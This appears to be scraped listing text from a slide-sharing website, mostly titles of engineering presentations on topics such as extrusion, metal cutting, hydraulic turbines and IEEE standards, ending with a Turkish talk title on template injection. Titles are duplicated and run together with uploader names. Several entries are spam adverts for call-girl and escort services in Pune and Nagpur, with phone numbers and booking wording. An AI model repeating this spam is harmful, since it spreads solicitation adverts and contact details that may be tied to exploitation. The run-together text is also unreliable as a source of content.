Processing & Properties of Floor and Wall Tiles.pptxpranjaldaimarysona
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations120cr0395
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingrknatarajan
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGMANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGSIVASHANKAR N
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxupamatechverse
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...ranjana rawat
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Call Girls in Nagpur High Profile
 

Último (20)

Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
Introduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptxIntroduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptx
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptx
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
 
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsRussian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptx
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGMANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptx
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024
 

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016